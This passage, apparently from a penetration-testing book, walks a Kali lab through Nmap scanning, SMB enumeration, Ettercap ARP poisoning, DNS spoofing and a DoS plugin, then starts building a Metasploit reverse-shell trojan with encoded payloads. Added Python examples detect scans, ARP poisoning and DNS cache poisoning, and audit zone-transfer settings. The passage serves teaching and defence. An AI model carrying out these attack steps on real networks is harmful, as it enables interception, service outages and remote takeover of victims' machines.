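        s2c = ((p.dst, p.dport), (p.src, p.sport))
        if p.flags == "S":                        # first leg of the handshake
            self.flows[c2s] = {"state": "SYN_SENT", "client_isn": p.seq, "data": []}
            return
        if c2s in self.flows:
            f, who = self.flows[c2s], "client"
        elif s2c in self.flows:
            f, who = self.flows[s2c], "server"
        else:
            return                                # no SYN seen for this flow; ignore it
        if f["state"] == "SYN_SENT" and who == "server":
            # second leg: the server must acknowledge the client's sequence number + 1
            if p.flags == "SA" and p.ack == f["client_isn"] + 1:
                f["state"], f["server_isn"] = "SYN_RECEIVED", p.seq
            elif "R" in p.flags:
                f["state"] = "REFUSED"            # a closed port answers the SYN with RST
        elif f["state"] == "SYN_RECEIVED" and who == "client":
            # third leg: the client must acknowledge the server's sequence number + 1
            if p.flags == "A" and p.ack == f["server_isn"] + 1:
                f["state"] = "ESTABLISHED"
            elif "R" in p.flags:
                f["state"] = "HALF_OPEN_RESET"    # SYN/ACK answered with RST: SYN-scan fingerprint
        elif f["state"] == "ESTABLISHED":
            if p.payload:
                f["data"].append((who, p.payload))
            if "F" in p.flags:                    # teardown tracked loosely: the first FIN closes the flow
                f["state"] = "CLOSED"

    def follow_stream(self, client, server):
        """The conversation as Wireshark's Follow TCP Stream would show it."""
        return "\n".join(f"{who}: {data.decode()}" for who, data in self.flows[(client, server)]["data"])

    def half_open_report(self):
        """Distinct ports per source host that were left half-open or reset right after SYN/ACK.
        Many such ports from one host is what a SYN scan looks like to a defender."""
        ports = defaultdict(set)
        for (client, server), f in self.flows.items():
            if f["state"] in ("SYN_RECEIVED", "HALF_OPEN_RESET"):
                ports[client[0]].add(server[1])
        return {host: len(p) for host, p in ports.items()}


KALI, WIN = "192.168.211.130", "192.168.211.129"   # addresses used in the book's lab
SCANNER = "192.168.211.131"                         # constructed third host


def build_sample_tracker():
    """Feed constructed traffic: the netcat chat on port 2222, then a SYN scan of three ports."""
    chat = [
        Pkt(KALI, 40000, WIN, 2222, "S", 1000, 0, b""),
        Pkt(WIN, 2222, KALI, 40000, "SA", 5000, 1001, b""),
        Pkt(KALI, 40000, WIN, 2222, "A", 1001, 5001, b""),
        Pkt(KALI, 40000, WIN, 2222, "PA", 1001, 5001, b"Hello from Kali"),
        Pkt(WIN, 2222, KALI, 40000, "PA", 5001, 1016, b"Hello from Windows"),  # constructed reply
        Pkt(KALI, 40000, WIN, 2222, "FA", 1016, 5019, b""),
    ]
    scan = []
    for i, port in enumerate((22, 80, 445)):
        sport = 50000 + i
        scan.append(Pkt(SCANNER, sport, WIN, port, "S", 7000, 0, b""))
        if port == 80:                               # closed port: RST/ACK comes back
            scan.append(Pkt(WIN, port, SCANNER, sport, "RA", 0, 7001, b""))
        else:                                        # open port: SYN/ACK, then the scanner resets
            scan.append(Pkt(WIN, port, SCANNER, sport, "SA", 9000, 7001, b""))
            scan.append(Pkt(SCANNER, sport, WIN, port, "R", 7001, 0, b""))
    t = FlowTracker()
    for p in chat + scan:
        t.feed(p)
    return t


if __name__ == "__main__":
    t = build_sample_tracker()
    print(t.follow_stream((KALI, 40000), (WIN, 2222)))
    print(t.half_open_report())
```

The acknowledgment checks are exactly the "sequence number plus one" rule described above; a packet that fails them never advances the flow. On a real sensor the same state table, keyed by source host, is what distinguishes a connect scan (many ESTABLISHED flows to different ports) from a SYN scan (many flows stuck in SYN_RECEIVED or reset straight after the SYN/ACK).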

Introducing NMAP
Many systems and network administrators find Nmap useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Before exploring the different options on how to use Nmap, it is important to understand the basic options, because it can get complex later on. Nmap is a case-sensitive tool, so make sure you type options in the proper case, as shown below.
Option     Name                    Description
-sS        TCP SYN scan            The default and quickest way to scan thousands of ports. Half-open scanning.
-sT        TCP Connect scan        The system call completes connections to open target ports rather than performing the half-open reset that the SYN scan does.
-sU        UDP scan                Works by sending a UDP packet to every targeted port.
-sN        TCP Null scan           Sends TCP packets with none of the TCP flags set. If an RST packet comes back the port is closed; if nothing is returned it is either filtered or open.
-sn        Ping sweep              Only sends ping packets to the target, no port scanning. Useful if you need to determine which hosts are in the vicinity but do not want to scan them yet.
-v         Increase verbosity      Gives you extra information in the output of nmap.
-T4        Timing template         0: paranoid, 1: sneaky, 2: polite, 3: normal, 4: aggressive, 5: insane.
-sV        Enumerate services      Actively probes open ports to try to determine what service and version they are running.
-p         Port                    Comma separated list of ports to scan.
-oG        Grepable output         Redirects the output to a text file.
-F         Fast mode               Instead of scanning as many ports as the default scan does, the fast scan only scans the 100 most common.
-O         Check OS                nmap tries to determine the OS type.
-A         Check OS + services     Detects OS and services.
-Pn        Skip discovery          Assumes the host is up, thus skipping the host discovery phase.
--script   Use script              Takes a comma separated list of files, categories and directories containing NSE scripts.

The -sS option stands for the TCP SYN scan, which is the quickest way to perform a scan, as mentioned before. It is based on half-opening the TCP three-way handshake. With the -sT option, we are telling Nmap to use the full three-way handshake to establish a connection with the target and determine whether the ports are open. When we scan ports that are based on UDP, such as DNS, we have to use the -sU option.
Another way to scan is the -sN option, which sends TCP packets with no flags set; the SYN, SYN/ACK and ACK packets all have flags set, such as the SYN and ACK flags. So we send a packet with no flags set, and if the scan returns an RST (reset) packet, the destination port is closed. However, if nothing is returned, the port is open or filtered. The -sn option stands for pinging or sweeping the target: we ping the target just to know if it is alive. If it is, we might consider scanning it as a next step, so this just probes the network without actually scanning.
The -v option increases verbosity. This gives us extra information and progress information about our scan. The -T option is a timing template, where 3 is the default; 5 (insane) is the fastest and 0 (paranoid) is the slowest. It can take you from a couple of milliseconds performing an insane scan up to a couple of minutes performing a paranoid scan. The -sV option enumerates and determines the services and their versions running on the destination host. -p stands for port, and -oG redirects the output to a text file for further analysis. -O checks the OS type, -A detects the OS and the services running, -Pn skips discovery and just pretends that the host is up and running before performing the scans, and --script invokes the Nmap scripting engine, which is very useful for performing what is beyond just port scanning.

NMAP and ZENMAP Simplified
Zenmap, a graphical and user-friendly version of the Nmap tool, has all the precepts of what we are going to study in this section. First of all, the default command for Nmap target selection is:
nmap <the IP address of your local machine>
Then press enter and wait for the results, as shown below.

You can get the same results using a hostname instead of an IP address, for example:
nmap www.abcd.com
If you want to scan a range of IP addresses, or a subnet, you can use:
nmap <IP address range>
If you have a fixed list of IP addresses, put them in a text file and issue the following command:
nmap -iL <file name>

Scanning a specific port requires the -p option, as seen below.
If you want to do a fast scan, use the -F attribute, which scans the most commonly used ports. It is worth mentioning that the default nmap command scans a thousand ports and can take some time, so if you only want the most common port numbers, use -F. Notice that we have the SSH port open in addition to the NetBIOS port, and the SMB ports are open as shown at the bottom of the example below.

If you want to do an extensive scan of all the ports, issue the following command:
nmap -p 1-65535 -T4 -A -v <IP address>
It will take a long time, because it scans almost all 65,000 ports.
Some attributes to understand:
-p is the port range, from one to 65535.
-T4 is the timing template. This attribute can go from T0 to T5, T0 being the slowest type of scan and T5 the fastest; it controls how fast Nmap performs and gives the user an easy way to tune the speed of the scan.
-A allows Nmap to make an effort to identify the target OS, the services and their versions. It also does a traceroute and applies some NSE (Nmap Scripting Engine) scripts in order to detect additional information. This is a huge scan and it is actually quite noisy, as it runs many different scans.
If you want to select the type of scan, use the following command:
nmap -sT <the IP address>
As we mentioned earlier, we have two types of scans: the SYN scan, which is the default, and the connect scan. If you want to force Nmap to use the connect scan, add the attribute -sT. If you want the default type of scan, use the -sS attribute.
If you want to scan UDP ports, use the attribute -sU and then specify the port numbers you are scanning.
If you want to output the result of a scan to a text file, use the -oG option and you will find the result in the text file you specify.
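Since the text recommends -oG for saving results, here is an added Python parser for that format; it is not code from the book or from Nmap. The result lines for the two hosts are constructed to match the grepable layout (one Status line and one Ports line per host, tab-separated fields, seven slash-separated values per port entry), and the final check looks for the NetBIOS/SMB ports that the next section enumerates.

```python
"""Parser for Nmap grepable output (-oG) plus a quick exposure check.
Added example; the scan results below are constructed, not captured."""

# Constructed -oG sample.  Real files use the same layout: "# Nmap" comment lines,
# then per host a "Host: ip (name)\tStatus: Up" line and a "Host: ip (name)\tPorts: ..." line.
SAMPLE_OG = (
    "# Nmap scan report (constructed sample)\n"
    "Host: 192.168.211.129 ()\tStatus: Up\n"
    "Host: 192.168.211.129 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)\n"
    "Host: 192.168.211.2 ()\tStatus: Up\n"
    "Host: 192.168.211.2 ()\tPorts: 53/open/udp//domain///\tIgnored State: closed (99)\n"
    "# Nmap done (constructed sample)\n"
)


def parse_grepable(text):
    """Return {host: [(port, protocol, state, service, version), ...]}.

    Each Ports entry is port/state/protocol/owner/service/rpcinfo/version/ and
    entries are separated by ", "."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                   # skip "# Nmap ..." comment lines
        fields = dict(part.split(": ", 1) for part in line.split("\t") if ": " in part)
        host = fields["Host"].split()[0]               # drop the "(hostname)" part
        ports = results.setdefault(host, [])
        for entry in filter(None, fields.get("Ports", "").split(", ")):
            port, state, proto, _owner, service, _rpc, version, *_ = entry.split("/")
            ports.append((int(port), proto, state, service, version))
    return results


def open_ports(results, host):
    """Sorted list of port numbers reported open for one host."""
    return sorted(p for p, _proto, state, *_ in results.get(host, []) if state == "open")


SMB_PORTS = {139, 445}   # NetBIOS session service and SMB over TCP


def smb_exposed(results):
    """Hosts answering on the ports the NetBIOS/SMB section works with."""
    return sorted(h for h in results if SMB_PORTS & set(open_ports(results, h)))


if __name__ == "__main__":
    parsed = parse_grepable(SAMPLE_OG)
    for host in parsed:
        print(host, open_ports(parsed, host))
    print("SMB reachable on:", smb_exposed(parsed))
```

Because -oG keeps one host per line, the same parser works on a scan of a whole subnet and turns it into an inventory a defender can diff from week to week: a port that appears in this week's output but not last week's is the finding.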

Understand NETBIOS and SMB Attacks
The Server Message Block (SMB) protocol has had a poor security track record over the last decade due to its complex implementation and open nature.

Many versions have been devised:
SMB 1 - Windows 2000
SMB 2 - Windows Server 2008 and Windows Vista SP1
SMB 2.1 - Windows Server 2008 R2 and Windows 7
SMB 3.0 - Windows Server 2012 and Windows 8 / 10
The latest SMB 3.0 version is 3.0.2, shipped with Windows 8.1 and Windows Server 2012, and the newest version of all is SMB 3.1.1 on Windows 10 and Windows Server 2016. There are some tools in Kali specialized in getting NetBIOS information, such as NBTScan. The command will give you the NetBIOS name, the server, the MAC address, etc., as shown below.

There is another tool named enum4linux, used for the same purpose. The syntax is enum4linux -a followed by the IP address. This tool gives you more information than NBTScan. The target Windows machine used in the example below is recent, so you will not find the vulnerabilities that exist in the previous SMB versions. But to give you an overview of what this tool does, you will get information about the users created on this machine, the groups, the password policies and their details, the host, the UX and some share information. This is an outstanding tool when it comes to discovering SMB vulnerabilities.

Execute Man-in-the-Middle Attacks
A man-in-the-middle attack is a type of cyberattack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A man-in-the-middle attack allows a malicious actor to intercept, send and receive data meant for someone else, or not meant to be sent at all, without either party knowing until it is too late.
Man-in-the-middle attacks encompass a broad range of techniques and potential outcomes, depending on the target and the goal. But before going further, we need to start with the basics: the OSI layers.
We have seven layers: application, presentation, session, transport, network, data link and physical. The mnemonic “All People Seem To Need Data Processing” makes the order easy to memorize. The most important protocol we will discuss in this section is ARP, which functions at the data link layer and is responsible for translating layer-three IP addresses to MAC addresses.
Layer   Name           Role                                          Protocols          Addressing
7       Application    Access to network resources                   HTTP, FTP, DNS
6       Presentation   Format, encryption and compression of data
5       Session        Establish, manage, and terminate sessions
4       Transport      How much data to send and receive             TCP, UDP           Port
3       Network        Move packets from source to destination       IP, ICMP           IP
2       Data Link      Frame formation                               Ethernet II, ARP   MAC
1       Physical       Transmission of bits

ARP spoofing, or ARP poisoning, is a technique in which the attacker sends spoofed ARP messages onto a LAN. Generally, the aim of this attack is to associate the attacker's MAC address with the IP of another host, in most cases the default gateway, causing traffic meant for the legitimate host to be delivered to the attacker instead.
In the example below, suppose that Mr. Nice's computer is trying to communicate with the default gateway, IP 192.168.1.1. The computer will need to know the destination MAC address before sending the data. Mr. Nice's computer sends an ARP request as a broadcast message on the network, asking all hosts whether they have the MAC address of the destination IP. The computer concerned replies with its MAC address, and this reply is cached on Mr. Nice's machine. That is what happens under normal circumstances.

In the anomalous situation, Mr. Bad, a malicious user, has access to the network; this is essential, because the attack only works from inside the network. Mr. Bad then sends fake ARP replies saying that his MAC address is associated with the advertised IP address. As you can notice, there was no ARP request, yet Mr. Bad was able to send a reply. This is the vulnerability in the protocol: you do not need to be authenticated to send an ARP reply, and any host can just connect to the network and send a fake ARP reply message. In this case, Mr. Nice will cache this message saying that the IP is associated with Mr. Bad's MAC address. ARP is the de facto protocol in network communication, with such a vulnerability!
Anyone with access to the network can take advantage of this vulnerability and route the traffic to their machine. This kind of technique has some legitimate uses as well, especially in server fail-over, where one server takes over the traffic of another in case of failure. But this is not widely used, because it needs dedicated tools.
To execute an ARP poisoning attack, go to the Windows machine, which is the victim's machine, and type ipconfig. The default gateway of this machine is 192.168.211.2. To get the MAC address of this default gateway, type the command arp -a, and you will find the cached entries on this machine. The first entry is the default gateway, and its MAC address ends with d2, as shown below. Don't forget to invoke the sudo command.
Our aim is to change this cached entry. Now go to your Kali machine, open a terminal and type ifconfig to get the MAC address of this machine, which again is a malicious machine that has illegal access to the victim's network.

As shown in the image above, the MAC address of the Kali machine ends with 4b. A good tool for the ARP poisoning attack is Ettercap, found under the sniffing and spoofing tools. Open the application, open the Sniff menu, choose Unified sniffing and select the interface, then go to the Hosts menu and click Scan for hosts. Ettercap will identify all the hosts on the network. If you want to see the host list, open the Hosts menu and then the Host list sub-menu. Select the IP address of the target machine, in our case the one ending with .129, and press the Add to Target 1 button. Next go to the Mitm menu (which can be a menu icon), select ARP poisoning, tick the option Only poison one-way, and press OK. A fake ARP reply has now been sent to the target machine. To verify this, go to the target machine and type arp -a again in the command line.
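The change you just verified with arp -a is also what a passive monitor on the same LAN can catch. The Python below is an added example, not code from the book or from Ettercap: it watches ARP frames and raises an alert when a reply arrives that nobody requested, and a second, stronger one when an IP already learned is claimed by a different MAC. The frames are constructed; the text only gives the last byte of the gateway and Kali MAC addresses, so the full addresses here are made up, while 192.168.211.2 and .129 are the lab addresses from the text.

```python
"""Passive ARP monitor built on the weakness the text describes: any host may send
an ARP reply that nobody asked for.  Added example, not from the book or from
Ettercap; the frames and the full MAC addresses below are constructed."""
from collections import namedtuple

# One ARP frame: op is "request" or "reply"; sender_ip/sender_mac is what the frame claims.
Arp = namedtuple("Arp", "op sender_ip sender_mac target_ip")


class ArpMonitor:
    def __init__(self):
        self.table = {}        # ip -> mac from the first reply seen; never overwritten
        self.pending = set()   # IPs that were asked for and not yet answered
        self.conflicts = {}    # ip -> set of MACs that have claimed it
        self.alerts = []

    def observe(self, frame):
        """Update state from one frame and return the alerts it raised."""
        if frame.op == "request":
            self.pending.add(frame.target_ip)
            return []
        ip, mac, raised = frame.sender_ip, frame.sender_mac, []
        if ip in self.pending:
            self.pending.discard(ip)
        else:
            # Mr. Bad's move: a reply with no request on the wire (unsolicited / gratuitous)
            raised.append(f"unsolicited reply: {ip} announced by {mac}")
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
        elif known != mac:
            # the same IP now claimed by another MAC: what the victim's arp -a shows after poisoning
            self.conflicts.setdefault(ip, {known}).add(mac)
            raised.append(f"mapping conflict: {ip} was {known}, now claimed by {mac}")
        self.alerts.extend(raised)
        return raised


GATEWAY, VICTIM = "192.168.211.2", "192.168.211.129"   # lab addresses from the text
GATEWAY_MAC = "00:50:56:aa:bb:d2"   # constructed; the text only says the real one ends with d2
KALI_MAC = "00:0c:29:cc:dd:4b"      # constructed; the text only says the Kali MAC ends with 4b
VICTIM_MAC = "00:0c:29:ee:ff:01"    # constructed


def run_sample():
    """Replay three constructed frames: a normal request/reply, then the poisoning reply."""
    m = ArpMonitor()
    for frame in (
        Arp("request", VICTIM, VICTIM_MAC, GATEWAY),   # who has 192.168.211.2?
        Arp("reply", GATEWAY, GATEWAY_MAC, VICTIM),    # the real gateway answers
        Arp("reply", GATEWAY, KALI_MAC, VICTIM),       # Kali claims the gateway IP; nobody asked
    ):
        m.observe(frame)
    return m


if __name__ == "__main__":
    for alert in run_sample().alerts:
        print(alert)
```

An unsolicited reply on its own is a weak signal, because gratuitous ARP is exactly how the legitimate fail-over case mentioned above works; the conflict with a binding already learned is the signal worth paging on. Tools such as arpwatch keep this kind of table on real networks, and static ARP entries on critical hosts or Dynamic ARP Inspection on the switch stop the poisoned reply from being accepted at all.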

Perform a DNS Spoofing Attack
DNS-based attacks are on the rise because many organizations do not realize
DNS is a threat vector and therefore do not protect it. Now, we will discuss
an important DNS attack named DNS spoofing or cache poisoning; you can
use these words interchangeably.
DNS or domain name server is a piece of software that translates human
readable domain names such as google.com, facebook.com to IP addresses
that are used throughout communication over the internet.
Normally, if the server does not know a requested translation, it asks the next DNS server to do the translation for it, and so on; this is called recursion. To increase performance, DNS servers usually cache these translations locally for a certain period of time before they expire. This means that if a DNS server that caches these answers receives a similar request, it does not recurse or forward the request to the next DNS server, but replies directly from its cache.
So, here is the vulnerability: when a DNS server receives a false translation of a domain name to an IP, it caches this false translation for optimization purposes; we now consider the DNS server poisoned, as it will supply clients with the wrong IP address, which is usually an attacker's IP address. Let us go directly to our Kali machine and demonstrate this attack.
Go to the www directory and create a simple HTML page containing just the sentence "You have been hacked", as seen in the two images below. Our plan is to redirect the victim, our target client, to this fake page.
We will use the Ettercap application again, but before doing that we have to do some configuration first: type locate etter.conf in your terminal.

Before starting with this attack, make sure to change the UID and GID to zero. The default configuration starts with 65; whatever the number is, just make sure that it is zero so you can use this file.
You can see the file has lots of translations; we are interested in these translations, so uncomment the microsoft.com entries for the hostname (remove the comment marker and add a star), so that we create a host entry that redirects them to the local IP, as shown below. Make sure to save and then close the file.

Now open the Ettercap application and start sniffing on the interface, then go to the Hosts menu and the Scan for hosts submenu. Now we can discover the hosts available on the network. Select the target machine, the one ending with .129 in our case, and press Add to Target 1. Go to the Mitm menu (which can be a menu icon), select the ARP poisoning sub-menu, tick Sniff remote connections, and press OK.
Now go to the Plugins menu, click on the Manage plugins sub-menu, and click on the dns_spoof plugin to activate it. Now everything is up and running. Go to the victim's machine and try to browse any website, to be redirected to our fake page.
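The cache behaviour described at the start of this section, as an added Python model rather than code from the book or from Ettercap: a naive cache that stores whatever answer arrives beside a checked cache that accepts an answer only when it matches a question it actually sent (same name, transaction ID and UDP port) and keeps only records that belong to the zone the queried server is authoritative for. The query, the forged answer and the genuine answer are constructed; 192.168.211.130 is the Kali address from the lab, and treating the queried name's parent domain as the server's zone is a simplification. Real resolvers also check the answer's source address, and the Ettercap demo above forges answers to the LAN client rather than to a recursive server, but the lesson is identical: an answer nobody asked for must not be cached.

```python
"""Two toy resolver caches for the weakness the text describes.  NaiveCache keeps
the first answer it sees for a name and serves it from cache afterwards; CheckedCache
only accepts answers that match an outstanding question and stay in bailiwick.
Added example; every message below is constructed."""
from collections import namedtuple

Query = namedtuple("Query", "name txid sport zone")      # zone: what the queried server is authoritative for
Answer = namedtuple("Answer", "name txid dport records")  # records: list of (name, ip)


class NaiveCache:
    """Caches whatever arrives.  Once an entry exists, later answers are ignored
    until it expires, so a forged answer that lands first wins."""
    def __init__(self):
        self.cache = {}

    def ask(self, q):
        pass                                    # keeps no memory of what it asked

    def handle(self, ans):
        for name, ip in ans.records:
            self.cache.setdefault(name, ip)     # no matching of any kind
        return True


class CheckedCache:
    """Accepts an answer only if it matches a question in flight and the records
    fall inside the queried server's zone (the bailiwick rule)."""
    def __init__(self):
        self.cache = {}
        self.outstanding = {}                   # (txid, sport) -> Query

    def ask(self, q):
        self.outstanding[(q.txid, q.sport)] = q

    def handle(self, ans):
        q = self.outstanding.get((ans.txid, ans.dport))
        if q is None or q.name != ans.name:
            return False                        # nobody asked this: drop it
        del self.outstanding[(ans.txid, ans.dport)]
        for name, ip in ans.records:
            # a server for example.com has no business telling us about example.net
            if name == q.zone or name.endswith("." + q.zone):
                self.cache.setdefault(name, ip)
        return True


KALI = "192.168.211.130"   # the attacker's address in the book's lab


def run_sample():
    """Replay one question, a forged answer and the genuine answer against both caches.
    Returns {class name: (cache instance, [accepted forged?, accepted genuine?])}."""
    question = Query("www.example.com", 0x1F2E, 41337, "example.com")
    forged = Answer("www.example.com", 0x0001, 53,                   # wrong txid, wrong port, unsolicited
                    [("www.example.com", KALI)])
    genuine = Answer("www.example.com", 0x1F2E, 41337,
                     [("www.example.com", "192.0.2.10"),
                      ("login.example.net", "192.0.2.66")])          # out-of-bailiwick extra record
    results = {}
    for cls in (NaiveCache, CheckedCache):
        c = cls()
        c.ask(question)
        results[cls.__name__] = (c, [c.handle(forged), c.handle(genuine)])
    return results


if __name__ == "__main__":
    for name, (c, accepted) in run_sample().items():
        print(name, accepted, c.cache)
```

The naive cache ends up poisoned for www.example.com and additionally carries the out-of-zone login.example.net record, which is how one forged answer can hijack a second domain. The checked cache rejects the forged answer outright and keeps only the in-zone record from the genuine one.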

Identify a DNS Zone Transfer Vulnerability
In this section, I will discuss another type of attack on DNS, the DNS zone transfer vulnerability. A DNS zone transfer is a replication process between two servers, a master and a slave, where the slave server requests a copy of the zone file from the master; depending on the master's configuration, the transfer may or may not take place.
In the image below, notice that the DNS zone transfer is configured to take place only to one server with a specific IP address. Unfortunately, some companies mix their internal and external DNS names in the same zone, so that if the zone transfer is misconfigured, you end up with a full map of the network, which is a very valuable piece of information to start with.
The information that might be revealed by a DNS attack or DNS reconnaissance is extensive: start of authority (SOA), name servers (NS), any hosts configured on the DNS, canonical names, pointers, MX records, etc. Such information is priceless for any attacker in the planning phase.
We will use a tool named dnsrecon, an advanced DNS enumeration script written in Python, mainly used for DNS reconnaissance. It can enumerate DNS records, perform zone transfers and reverse lookups. You can invoke it by typing dnsrecon. Type help to get all the help on the arguments needed to run the script.
Let us go directly to an example: type dnsrecon with the -d argument, which stands for domain. I will use a domain called zonetransfer.me and invoke it:
dnsrecon -d zonetransfer.me -a
DNS reconnaissance has started; the script will get all the information about the SOA record, the name servers and the MX records, as well as the TXT record, which is commonly used to validate the origin of email sent from your domain.
The -a argument instructs dnsrecon to attempt a zone transfer. The process takes some time, but you can notice that the zone transfer has completed successfully, as seen below.

The script will loop through all the name servers and get all the DNS records.
It will try the first name server, and this would result in all information
associated. Similarly, the second name server would result in all the
information of the records as well.
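The restriction shown in the image above, transfers allowed to one secondary only, is a named.conf setting, and a defender can audit it before dnsrecon does. The Python below is an added example, not code from the book or from dnsrecon: it walks a BIND configuration and reports, per zone, whether allow-transfer is restricted, disabled, or open to any host. The configuration text is constructed, with one zone of each kind, and the parser understands only the subset of named.conf syntax shown (top-level options and zone blocks, // comments, one allow-transfer statement per block).

```python
"""Audit a BIND named.conf for the zone-transfer misconfiguration the text describes:
zones that let any host pull a full copy of the zone.  Added example; the config is
constructed and the parser covers only the named.conf subset used here."""
import re

SAMPLE_CONF = """
options {
    directory "/var/named";
    allow-transfer { none; };           // global default: no transfers at all
};

zone "corp.example" {
    type master;
    file "db.corp.example";
    allow-transfer { 192.0.2.53; };     // only the secondary may pull the zone
};

zone "lab.example" {
    type master;
    file "db.lab.example";
    allow-transfer { any; };            // weak: anyone can dump the whole zone
};

zone "old.example" {
    type master;
    file "db.old.example";              // no statement: inherits the options{} value
};
"""

XFER_RE = re.compile(r"allow-transfer\s*\{([^}]*)\}")


def blocks(conf, keyword):
    """(label, body) for each top-level `keyword ... { body };`, matching braces by depth
    so that nested statements such as allow-transfer { ... }; stay inside the body."""
    found = []
    for m in re.finditer(r"(?m)^\s*" + keyword + r"\b([^{]*)\{", conf):
        depth, i = 1, m.end()
        while depth and i < len(conf):
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        found.append((m.group(1).strip().strip('"'), conf[m.end():i - 1]))
    return found


def transfer_acl(body):
    """ACL entries of an allow-transfer statement, or None when the statement is absent."""
    m = XFER_RE.search(body)
    if m is None:
        return None
    return [e.strip() for e in m.group(1).split(";") if e.strip()]


def audit(conf):
    """{zone: verdict}.  A zone without its own statement inherits the options{} value;
    if neither exists we report the zone open, the conservative reading."""
    global_acl = None
    for _, body in blocks(conf, "options"):
        global_acl = transfer_acl(body)
    report = {}
    for name, body in blocks(conf, "zone"):
        acl = transfer_acl(body)
        effective = acl if acl is not None else global_acl
        if effective is None or "any" in effective:
            report[name] = "OPEN: any host may request a zone transfer"
        elif effective == ["none"]:
            report[name] = "closed"
        else:
            report[name] = "restricted to " + ", ".join(effective)
    return report


if __name__ == "__main__":
    for zone, verdict in audit(SAMPLE_CONF).items():
        print(f"{zone}: {verdict}")
```

The lab.example zone is the one dnsrecon -a would dump; corp.example is the configuration the image above shows, a single secondary permitted; old.example is safe only because the global option covers it, which is why the audit resolves the inherited value instead of reporting "no statement".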

Plan DOS and DDOS Attacks
Denial of service is a simple attack that aims to prevent the target system from operating as it should. In its simplest form it uses up all the system's resources so that other people cannot connect legitimately and use the server. DOS attacks are the easiest we will learn in this book: they only require installing an application, entering the target IP, and pressing enter to run the attack.
DOS attacks can be categorized under three main categories; volume based,
protocol-based, and application layer attacks.
Volume-based attacks occur when the attacker sends a large volume of
packets to the target machine, thereby fully consuming the available
bandwidth.
Protocol-based attacks occur when the attacker utilizes all the resources of
the target machine. Such attacks include smurf attacks, fraggle attacks, SYN
floods and Ping of Death. Here we are not utilizing the bandwidth but rather
utilizing the resources of the server.
Application layer attacks occur when extensive application layer requests are
being sent to web servers such as Microsoft IIS or Apache server with the
intent to crash it.
DDOS attacks have the same arrangement, but involve simultaneous attacks from different locations and IPs.
In order to perform a DOS attack, open the terminal, and type ettercap -G .
Go to the Plugins menu, Manage plugins submenu, and select dos_attack
plugin, double click on this plugin, and enter the target IP once prompted, to
start the attack, as shown below.
All-in-one Metasploit Framework
Metasploit is a framework that contains an extensive collection of exploits; it
is one of the most popular open source free tools for security professionals;
there is a commercial version available as well. In this section I will cover the
basic structure of Metasploit along with some techniques on how to use it. In
the upcoming sections, we will put what we will learn to practice.
We will start with the framework architecture depicted below. You can
access Metasploit using its interfaces, either through console, command line
interface, or the web version or other GUI tools that we will discuss later. The
underlying modules of Metasploit are five; payloads, exploits, encoders,
Nops and AUX.
So, let us start with basic definitions before going further into the details.
What is a module?
A module is a piece of software that can be used by the Metasploit framework.
What is a vulnerability?
A vulnerability is a weakness in the target system, such as a system that is not patched or does not have an antivirus. Through this vulnerability or weakness a successful access will occur.
What is an exploit?
Once a vulnerability is identified, an attacker takes advantage of it and breaks into the system using a certain piece of code or script, which is known as an exploit.
A payload is a set of tasks initiated by the attacker after the exploit in order to maintain access or do other tasks on the compromised system. You can call these listeners, rootkits, etc.
What is a shellcode?
It is a set of instructions used as a payload when the exploitation occurs, which results in a command shell being exposed.
An encoder is used to obfuscate the payload so that it is not detected by intrusion detection systems or antivirus. It sort of wraps the payload in an alternative form so that it is not easily detected.
Auxiliary modules provide additional functionality to the system such as scanning, recon and the UX attacks. Nops are pieces of software that prevent the payload from crashing on x86 systems by using jumps; do not worry about that, as we will not use it.
Metasploit modules are files available under /usr/share/metasploit-framework, as seen below.

We will use the console command to run Metasploit, so open your terminal, type msfconsole, and press enter. It will take some time to initiate the database and connect to it. You will notice that the prompt has changed, as we are now inside the Metasploit framework. Before going further, you might have noticed that the architecture has libraries as well. We have three main libraries: Rex, MSF core and MSF base.
The Rex library is the basic library for most of the attacks. It handles operations like protocols, text transformation, sockets, etc. The MSF core is the core library that provides the basic API, and the MSF base provides an additional, friendlier API on top of it.
As of now, this framework has around 2000 exploits, 1000 plus auxiliaries, 560 payloads, and 45 encoders.
With such a large number of exploits, searching becomes necessary. The easiest way to use the search function is to issue the command search followed by a search term. For example, type ‘search exploits’ to retrieve all the exploits available in the framework at the time, with the description of each exploit, its name, etc.
We can improve the search by specifying the platform we are looking for exploits for. So, we can select the Windows operating system, for example, and we will get all the exploits related to Windows, which are many. A better example is to narrow the search to Android and notice that it returns only the exploits that pertain to the Android platform. To select an exploit, type the word use, then show info to retrieve the description of the exploit.
In the example above, we have chosen to use the exploit payload/php/reverse_php. To set up the exploit, issue the show options command. Notice that the argument LHOST is empty, and we need to populate it as it is required. You can do that using the command set LHOST followed by an IP address. Type show options again to see the populated argument, as shown above.
Type show payloads to view the payloads related to the current exploit. You can now use these payloads along with the exploit.

To use the aix/ppc/shell_reverse_tcp payload for example, type the keyword use, as shown below.

Create Your First Trojan and Infiltrate a Target
How will we engineer this attack? First, we will create a malicious executable
program, the payload, for the target to host – a Windows 10 machine. Then,
we will run this file on the target host to expose its shell to our Kali machine;
so that we remotely control the victim’s machine.
Step 1: We will run Metasploit. You can run it directly, or you can use service postgresql start first to start the database service. After that, we will run Metasploit using msfconsole, as shown below. It is important to note that this attack can be done on a LAN as well as over the internet; you just change the IP addresses from private to public. Remember to use the sudo command if you are using the default kali account. If you face any issues, run the commands gem install bundler:1.17.3, then bundle update --bundler.

Step 2: MSFvenom is a combination of two commands that exist in Metasploit, MSFpayload and MSFencode. Now they are both in a single command, which is called MSFvenom.
Earlier, the MSFpayload was used to generate the payload in a specific form,
and then the MSFencode was used to encode the payload using various
algorithms. Now you can use one command to do both actions. After that
specify the payload, we will use windows/meterpreter/reverse_tcp. As we
said that the victim will expose its shell to us and we will be able to control it
remotely.
There are lots of encoders, such as Shikata Ga Nai, and then you specify how
many iterations this encoder will do to this payload, I will select 10 iterations.
Let us now, create a file called trojan.exe, as shown below:

Open a new terminal. Use the ls command to check that trojan.exe has been created.
Step 3: Now we are ready to move the file to the victim's machine and
execute it there. Upon successful execution, the target system will be fully
